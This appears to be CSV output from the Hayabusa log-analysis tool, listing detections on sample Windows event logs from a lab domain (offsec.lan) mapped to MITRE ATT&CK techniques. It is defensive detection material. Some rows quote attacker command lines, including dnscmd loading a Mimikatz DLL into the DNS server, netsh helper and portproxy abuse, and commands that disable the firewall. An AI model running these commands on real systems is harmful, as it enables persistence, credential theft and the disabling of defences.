0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx" 2021-05-15 06:01:37.111 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1548 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx" 2021-05-15 06:02:14.789 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x5e8 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx" 2021-05-15 06:02:35.208 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x5b8 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx" 2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,critical,Evas,DNS Server Error Failed Loading the 
ServerLevelPluginDLL,,rules/sigma/builtin/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx 2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,high,Exec,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx 2021-05-19 06:18:40.607 +09:00,rootdc1.offsec.lan,150,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx 2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,critical,Evas,DNS Server Error Failed Loading the ServerLevelPluginDLL,,rules/sigma/builtin/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx 2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,high,Exec,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx 2021-05-19 06:23:27.038 +09:00,rootdc1.offsec.lan,150,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID150-Failed DLL loaded by DNS server.evtx 2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: dnscmd.exe /config /serverlevelplugindll ""C:\TOOLS\Mimikatz-fev-2020\mimilib.dll"" | Path: C:\Windows\System32\dnscmd.exe | PID: 0x1498 | 
User: admmig | LID: 0x907c7c09",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx
2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,high,Exec,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx
2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx
2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx
2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,critical,Evas,DNS Server Error Failed Loading the ServerLevelPluginDLL,,rules/sigma/builtin/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx
2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,high,Exec,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx
2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx
2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx
2021-05-20 21:49:31.863 +09:00,fs01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx
2021-05-20 21:49:46.875 +09:00,fs01.offsec.lan,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: FS01$ | Target User: sshd_5848 | IP Address: - | Process: C:\Program Files\OpenSSH-Win64\sshd.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx
2021-05-20 21:49:46.876 +09:00,fs01.offsec.lan,4624,low,,Logon Type 5 - Service,User: sshd_5848 | Computer: - | IP Addr: - | LID: 0x3c569ed,rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx
2021-05-20 21:49:46.876 +09:00,fs01.offsec.lan,4672,info,,Admin Logon,User: sshd_5848 | LID: 0x3c569ed,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx
2021-05-20 21:49:52.315 +09:00,fs01.offsec.lan,4776,info,,NTLM Logon To Local Account,User: NOUSER | Computer: FS01 | Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx
2021-05-20 21:49:52.315 +09:00,fs01.offsec.lan,4625,info,,Logon Failure - User Does Not Exist,User: NOUSER | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx
2021-05-20 21:49:53.378 +09:00,fs01.offsec.lan,4776,info,,NTLM Logon To Local Account,User: NOUSER | Computer: FS01 | Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx
2021-05-20 21:49:53.378 +09:00,fs01.offsec.lan,4625,info,,Logon Failure - User Does Not Exist,User: NOUSER | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx
2021-05-20 21:49:54.043 +09:00,fs01.offsec.lan,4776,info,,NTLM Logon To Local Account,User: NOUSER | Computer: FS01 | Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx
2021-05-20 21:49:54.043 +09:00,fs01.offsec.lan,4625,info,,Logon Failure - User Does Not Exist,User: NOUSER | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx
2021-05-20 21:49:54.662 +09:00,fs01.offsec.lan,4776,info,,NTLM Logon To Local Account,User: NOUSER | Computer: FS01 | Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx
2021-05-20 21:49:54.662 +09:00,fs01.offsec.lan,4625,info,,Logon Failure - User Does Not Exist,User: NOUSER | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx
2021-05-20 21:49:54.945 +09:00,fs01.offsec.lan,4776,info,,NTLM Logon To Local Account,User: NOUSER | Computer: FS01 | Status: 0xc0000064,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx
2021-05-20 21:49:54.945 +09:00,fs01.offsec.lan,4625,info,,Logon Failure - User Does Not Exist,User: NOUSER | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx
2021-05-22 05:43:07.153 +09:00,fs01.offsec.lan,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: FS01$ | Target User: sshd_4332 | IP Address: - | Process: C:\Program Files\OpenSSH-Win64\sshd.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx
2021-05-22 05:43:07.153 +09:00,fs01.offsec.lan,4624,low,,Logon Type 5 - Service,User: sshd_4332 | Computer: - | IP Addr: - | LID: 0x47a203c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx
2021-05-22 05:43:18.227 +09:00,fs01.offsec.lan,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: FS01$ | Target User: admmig | IP Address: - | Process: C:\Program Files\OpenSSH-Win64\sshd.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx
2021-05-22 05:43:22.562 +09:00,fs01.offsec.lan,4625,low,,Logon Failure - Wrong Password,User: admmig@offsec.lan | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx
2021-05-22 05:43:49.345 +09:00,fs01.offsec.lan,4625,low,,Logon Failure - Wrong Password,User: admmig@offsec.lan | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx
2021-05-22 05:43:50.131 +09:00,fs01.offsec.lan,4625,low,,Logon Failure - Wrong Password,User: admmig@offsec.lan | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx
2021-05-22 05:43:50.607 +09:00,fs01.offsec.lan,4625,low,,Logon Failure - Wrong Password,User: admmig@offsec.lan | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx
2021-05-22 05:43:50.866 +09:00,fs01.offsec.lan,4625,low,,Logon Failure - Wrong Password,User: admmig@offsec.lan | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx
2021-05-23 06:56:57.685 +09:00,fs01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx
2021-05-23 06:57:11.842 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh add helper mimikatz.exe | Path: C:\Windows\System32\netsh.exe | PID: 0xd28 | User: admmig | LID: 0x75494,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx
2021-05-23 06:57:11.842 +09:00,fs01.offsec.lan,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx
2021-05-26 22:02:27.149 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x312517c1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
2021-05-26 22:02:27.149 +09:00,mssql01.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
2021-05-26 22:02:27.155 +09:00,mssql01.offsec.lan,5145,critical,Exec,CVE-2021-1675 Print Spooler Exploitation IPC Access,,rules/sigma/builtin/security/win_exploit_cve_2021_1675_printspooler_security.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
2021-05-26 22:02:27.155 +09:00,mssql01.offsec.lan,5145,medium,LatMov,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
2021-05-26 22:02:29.726 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x31251a6a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
2021-05-26 22:02:29.726 +09:00,mssql01.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
2021-05-26 22:02:29.734 +09:00,mssql01.offsec.lan,5145,critical,Exec,CVE-2021-1675 Print Spooler Exploitation IPC Access,,rules/sigma/builtin/security/win_exploit_cve_2021_1675_printspooler_security.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
2021-05-26 22:02:29.734 +09:00,mssql01.offsec.lan,5145,medium,LatMov,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
2021-05-26 22:02:34.373 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x31251ce4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
2021-05-26 22:02:34.375 +09:00,mssql01.offsec.lan,5145,medium,LatMov,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
2021-05-26 22:02:34.379 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x31251d11,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
2021-05-26 22:02:34.379 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x31251d23,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
2021-05-26 22:02:34.380 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x31251d36,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx
2021-05-27 05:24:46.570 +09:00,rootdc1.offsec.lan,4768,medium,CredAccess,Possible AS-REP Roasting,Possible AS-REP Roasting,rules/hayabusa/default/alerts/Security/4768_StealOrForgeKerberosTickets_AS-REP-Roasting.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-Kerberos AS-REP Roasting.evtx
2021-05-27 05:24:46.570 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: admin-test | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0 | PreAuthType: 0,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-Kerberos AS-REP Roasting.evtx
2021-06-01 23:06:34.542 +09:00,fs01.offsec.lan,4720,low,Persis,Local User Account Created,User: WADGUtilityAccount | SID: S-1-5-21-1081258321-37805170-3511562335-1000,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4720,4698-Fortinet APT group abuse on Windows.evtx"
2021-06-01 23:08:21.225 +09:00,fs01.offsec.lan,4720,low,Persis,Local User Account Created,User: elie | SID: S-1-5-21-1081258321-37805170-3511562335-1001,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4720,4698-Fortinet APT group abuse on Windows.evtx"
2021-06-03 21:17:56.988 +09:00,fs01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx
2021-06-03 21:17:58.582 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh I p a v l=8001 listena=0.0.0.0 connectp=3389 c=1.1.1.1 | Path: C:\Windows\System32\netsh.exe | PID: 0x578 | User: admmig | LID: 0x46b7b4,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx
2021-06-03 21:18:04.312 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=48333 connectaddress=127.0.0.1 connectport=80 | Path: C:\Windows\System32\netsh.exe | PID: 0x1048 | User: admmig | LID: 0x46b7b4,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx
2021-06-03 21:18:06.940 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh interface portproxy reset | Path: C:\Windows\System32\netsh.exe | PID: 0x46c | User: admmig | LID: 0x46b7b4,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx
2021-06-03 21:18:12.941 +09:00,fs01.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x322e5b7,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx
2021-06-03 21:18:12.942 +09:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x322e5b7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx
2021-06-04 03:34:12.672 +09:00,fs01.offsec.lan,4104,high,Evas,Windows Firewall Profile Disabled,,rules/sigma/powershell/powershell_script/posh_ps_windows_firewall_profile_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID800-4103-Firewall disabled.evtx
2021-06-04 04:17:44.873 +09:00,fs01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx
2021-06-04 04:17:46.489 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh a s p state off | Path: C:\Windows\System32\netsh.exe | PID: 0xfa8 | User: admmig | LID: 0x46b7b4,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx
2021-06-04 04:17:46.577 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh advfirewall set privateprofile state off | Path: C:\Windows\System32\netsh.exe | PID: 0x10fc | User: admmig | LID: 0x46b7b4,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx
2021-06-04 04:17:46.666 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh f s o d | Path: C:\Windows\System32\netsh.exe | PID: 0x1598 | User: admmig | LID: 0x46b7b4,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx
